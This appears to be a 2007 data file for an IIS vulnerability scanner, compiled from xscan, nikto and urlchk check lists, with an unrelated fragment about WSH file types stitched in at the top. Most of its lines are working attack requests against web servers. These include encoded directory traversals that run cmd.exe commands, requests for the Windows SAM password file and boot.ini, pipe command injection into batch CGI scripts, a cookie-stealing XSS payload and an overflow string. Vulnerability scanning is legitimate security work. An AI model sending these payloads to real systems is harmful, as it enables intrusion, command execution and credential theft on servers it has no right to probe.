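A row with an empty FileType corresponds to the NOTE above: the extension has no association, so clicking such a file does not start WSH.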

References:
WindowSecurity.com

Vulnerability Data File For IIS Vulnerability Scanner

March 3, 2007

by OkIDaN

This is the vulnerability data file for IIS Vulnerability Scanner. You can add/remove checks
from this file but do not modify this section in any way. This file contains more than 1500
checks and was compiled from vulnerability lists of programs like xscan, nikto.pl and urlchk.
GET***/_vti_pvt/author.log***200
GET***/_vti_pvt/authors.pwd***200
GET***/_vti_pvt/doctodep.btr***200
GET***/_vti_pvt/linkinfo.cnf***200
GET***/_vti_pvt/service.cnf***200
GET***/_vti_pvt/service.grp***200
GET***/_vti_pvt/service.pwd***200
GET***/_vti_pvt/service.stp***200
GET***/_vti_pvt/services.cnf***200
GET***/_vti_pvt/shtml.dll***200
GET***/_vti_pvt/shtml.exe***200
GET***/_vti_pvt/svacl.cnf***200
GET***/_vti_pvt/svcacl.cnf***200
GET***/_vti_pvt/users.pwd***200
GET***/_vti_pvt/writeto.cnf***200
GET***/_vti_pwd/administrators.pwd***200
GET***/_vti_txt***200
GET***/_vti_txt/***200
GET***/_vti_txt/_vti_cnf/***200
GET***/a.asp/.%u002e/.%u002e/.%u002e/.%u002e/winnt/win.ini***200
GET***/a.asp/.%u002e/.%u002e/.%u002e/..\winnt\repair\sam._***200
GET***/a.asp/..%%35%63../..%%35%63../winnt/win.ini***200
GET***/a.asp/..%%35%63../..%%35%63..\winnt\repair\sam._***200
GET***/a.asp/..%%35c../..%%35c../winnt/win.ini***200
GET***/a.asp/..%%35c../..%%35c..\winnt\repair\sam._***200
GET***/a.asp/..%25%35%63../..%25%35%63../winnt/win.ini***200
GET***/a.asp/..%25%35%63../..%25%35%63..\winnt\repair\sam._***200
GET***/a.asp/..%255c../..%255c../winnt/win.ini***200
GET***/a.asp/..%255c../..%255c..\winnt\repair\sam._***200
GET***/a.asp/..%c0%2f../..%c0%2f../winnt/win.ini***200
GET***/a.asp/..%c0%2f../..%c0%2f..\winnt\repair\sam._***200
GET***/a.asp/..%c0%af../..%c0%af../winnt/win.ini***200
GET***/a.asp/..%c0%af../..%c0%af..\winnt\repair\sam._***200
GET***/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini***200
GET***/a.asp/..%c1%1c../..%c1%1c..\winnt\repair\sam._***200
GET***/a.asp/..%c1%9c../..%c1%9c../winnt/win.ini***200
GET***/a.asp/..%c1%9c../..%c1%9c..\winnt\repair\sam._***200
GET***/a.asp/..%u00255c../..%u00255c../winnt/win.ini***200
GET***/a.asp/..%u00255c../..%u00255c..\winnt\repair\sam._***200
GET***/a.asp/..%u002f../..%u002f../winnt/win.ini***200
GET***/a.asp/..%u002f../..%u002f..\winnt\repair\sam._***200
GET***/a.asp/..%u005c../..%u005c../winnt/win.ini***200
GET***/a.asp/..%u005c../..%u005c..\winnt\repair\sam._***200
GET***/a.asp/..\../..\../winnt/repair/sam***200
GET***/a.jsp//..//..//..//..//..//../winnt/win.ini***200
GET***/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa***500
GET***/abczxv.htw***200
GET***/accept/***200
GET***/access-log***200
GET***/access.log***200
GET***/admcgi/contents.htm***200
GET***/admcgi/scripts/Fpadmcgi.exe***200
GET***/admentor/adminadmin.asp***200
GET***/admin-serv/config/admpw***200
GET***/admin/adminproc.asp***200
GET***/admin/datasource.asp***200
GET***/admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\><script>alert(document.cookie)</script>?tab1=TabsWebServer%26__SAPageKey=5742D5874845934A134CD05F39C63 240%26R=0.6756681557204625&R=0.9895845379540951&__SAPageKey=5742D5874845934A134CD05F39C63240***200
GET***/admisapi/***200
GET***/admisapi/fpadmin.htm***200
GET***/adsamples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/adsamples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/adsamples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/adsamples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/adsamples/config/site.csc***200
GET***/advworks/equipment/catalog_type.asp***200
GET***/app.cfm***200
GET***/asp/SQLQHit.asp***200
GET***/asp/sqlqhit.asp***200
GET***/autoexec.bat***200
GET***/b2/b2-include/b2edit.showposts.php***200
GET***/backup/***200
GET***/bdir.htr***200
GET***/bin/***200
GET***/bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/CGImail.exe***200
GET***/bin/_vti_cnf/***200
GET***/bin/admin.pl***200
GET***/bin/cfgwiz.exe***200
GET***/bin/cgimail.exe***200
GET***/bin/cgitest.exe***200
GET***/bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/bin/common/user_update_admin.pl***200
GET***/bin/common/user_update_passwd.pl***200
GET***/bin/contents.htm***200
GET***/bin/fpadmin.htm***200
GET***/bin/fpremadm.exe***200
GET***/bin/fpsrvadm.exe***200
GET***/bin/get32.exe***200
GET***/bin/lanscan.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C/winnt/system32/cmd.exe?/c+dir***200
GET***/bin/minimal.exe***200
GET***/bin/perl.exe***200
GET***/bin/ppdscgi.exe***200
GET***/bin/redir.exe***200
GET***/bin/rguest.exe***200
GET***/bin/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/bin/scripts/Fpadmcgi.exe***200
GET***/bin/scripts/openvendor/gnete/RetrievePNBody.asp***200
GET***/bin/testcgi.exe***200
GET***/bin/visitor.exe***200
GET***/bin/webbbs.exe***200
GET***/bin/ws_ftp.ini***200
GET***/blahb.ida***200
GET***/blahb.idq***200
GET***/c/winnt/system32/cmd.exe?/c+dir+/OG***200
GET***/carbo.dll***200
GET***/catalog.nsf***200
GET***/catalog.nsf/***200
GET***/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/cfappman/***200
GET***/cfappman/index.cfm***200
GET***/cfcache.map***200
GET***/cfdocs/***200
GET***/cfdocs/cfcache.map***200
GET***/cfdocs/cfmlsyntaxcheck.cfm***200
GET***/cfdocs/exampleapp/***200
GET***/cfdocs/exampleapp/docs/sourcewindow.cfm***200
GET***/cfdocs/exampleapp/email/application.cfm***200
GET***/cfdocs/exampleapp/email/getfile.cfm***200
GET***/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini***200
GET***/cfdocs/exampleapp/publish/admin/addcontent.cfm***200
GET***/cfdocs/exampleapp/publish/admin/application.cfm***200
GET***/cfdocs/examples/***200
GET***/cfdocs/examples/cvbeans/beaninfo.cfm***200
GET***/cfdocs/examples/httpclient/mainframeset.cfm***200
GET***/cfdocs/examples/parks/detail.cfm***200
GET***/cfdocs/expelval/displayopenedfile.cfm***200
GET***/cfdocs/expelval/exprcalc.cfm***200
GET***/cfdocs/expelval/openfile.cfm***200
GET***/cfdocs/expelval/sendmail.cfm***200
GET***/cfdocs/expeval/ExprCalc.cfm***200
GET***/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\WINNT\repair\sam._***200
GET***/cfdocs/expeval/displayopenedfile.cfm***200
GET***/cfdocs/expeval/eval.cfm***200
GET***/cfdocs/expeval/openfile.cfm***200
GET***/cfdocs/expeval/sendmail.cfm***200
GET***/cfdocs/expressions.cfm***200
GET***/cfdocs/mole.cfm***200
GET***/cfdocs/root.cfm***200
GET***/cfdocs/snippets/***200
GET***/cfdocs/snippets/evaluate.cfm***200
GET***/cfdocs/snippets/fileexists.cfm***200
GET***/cfdocs/snippets/gettempdirectory.cfm***200
GET***/cfdocs/snippets/viewexample.cfm***200
GET***/cfdocs/toxic.cfm***200
GET***/cfdocs/zero.cfm***200
GET***/cfide/***200
GET***/cfide/Administrator/***200
GET***/cfide/Administrator/startstop.html***200
GET***/cfide/administrator/index.cfm***200
GET***/cfusion/cfapps/forums/data/forums.mdb***200
GET***/cfusion/cfapps/security/data/realm.mdb***200
GET***/cfusion/cfapps/security/realm_.mdb***200
GET***/cfusion/database/cfsnippets.mdb***200
GET***/cfusion/database/cypress.mdb***200
GET***/cfusion/database/smpolicy.mdb***200
GET***/cgi***200
GET***/cgi-bin***200
GET***/cgi-bin/***200
GET***/cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%255c..%255c/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%c0%af/..%c0%af/..%c0%af/..%c0%af/..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\+/OG***200
GET***/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/cgi-bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/../../../../winnt/system32/cmd.exe***200
GET***/cgi-bin/..\..\..\../winnt/system32/cmd.exe***200
GET***/cgi-bin/..\\..\\..\\..\\..\\..\\winnt\system32\cmd.exe?/c+dir+c:\\***200
GET***/cgi-bin/.._../winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/CGImail.exe***200
GET***/cgi-bin/GW5***200
GET***/cgi-bin/GW5/GWWEB.EXE***200
GET***/cgi-bin/GWWEB.EXE***200
GET***/cgi-bin/MsmMask.exe***200
GET***/cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3***200
GET***/cgi-bin/Web_Store/web_store.cgi***200
GET***/cgi-bin/_vti_bin/***200
GET***/cgi-bin/_vti_cnf***200
GET***/cgi-bin/_vti_cnf/***200
GET***/cgi-bin/admin.pl***200
GET***/cgi-bin/alibaba.pl***200
GET***/cgi-bin/bb-hostsvc.sh***200
GET***/cgi-bin/c32web.exe/CheckError?error=53***200
GET***/cgi-bin/c32web.exe/ShowAdminDir***200
GET***/cgi-bin/ceilidh.exe***200
GET***/cgi-bin/cfgwiz.exe***200
GET***/cgi-bin/cgimail.exe***200
GET***/cgi-bin/cgitest.exe***200
GET***/cgi-bin/changepw.exe***200
GET***/cgi-bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/cmd.exe?/c+dir***200
GET***/cgi-bin/cmd1.exe?/c+dir***200
GET***/cgi-bin/contents.htm***200
GET***/cgi-bin/csChatRBox.cgi***200
GET***/cgi-bin/csLiveSupport.cgi***200
GET***/cgi-bin/csNews.cgi***200
GET***/cgi-bin/dbmlparser.exe***200
GET***/cgi-bin/echo.bat***200
GET***/cgi-bin/eyehack.exe?/c+dir+c:\***200
GET***/cgi-bin/fpadmin.htm***200
GET***/cgi-bin/fpcount.exe***200
GET***/cgi-bin/fpexplore.exe***200
GET***/cgi-bin/fpexplorer.exe***200
GET***/cgi-bin/fpremadm.exe***200
GET***/cgi-bin/fpsrvadm.exe***200
GET***/cgi-bin/get32.exe***200
GET***/cgi-bin/get32.exe\dir***200
GET***/cgi-bin/guestbook.cgi***200
GET***/cgi-bin/hello.bat***200
GET***/cgi-bin/hello.bat?&dir+c:\***200
GET***/cgi-bin/htimage.exe***200
GET***/cgi-bin/iisadmpwd/achg.htr***200
GET***/cgi-bin/iisadmpwd/aexp.htr***200
GET***/cgi-bin/iisadmpwd/aexp2.htr***200
GET***/cgi-bin/iisadmpwd/anot.htr***200
GET***/cgi-bin/imagemap.exe***200
GET***/cgi-bin/input.bat***200
GET***/cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\***200
GET***/cgi-bin/input2.bat***200
GET***/cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\***200
GET***/cgi-bin/lanscan.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C/winnt/system32/cmd.exe?/c+dir***200
GET***/cgi-bin/lsindex2.bat***200
GET***/cgi-bin/mailform.exe***200
GET***/cgi-bin/minimal.exe***200
GET***/cgi-bin/perl.exe***200
GET***/cgi-bin/post32.exe***200
GET***/cgi-bin/post32.exe|dir%20c:\***200
GET***/cgi-bin/ppdscgi.exe***200
GET***/cgi-bin/redir.exe***200
GET***/cgi-bin/redirect.exe***200
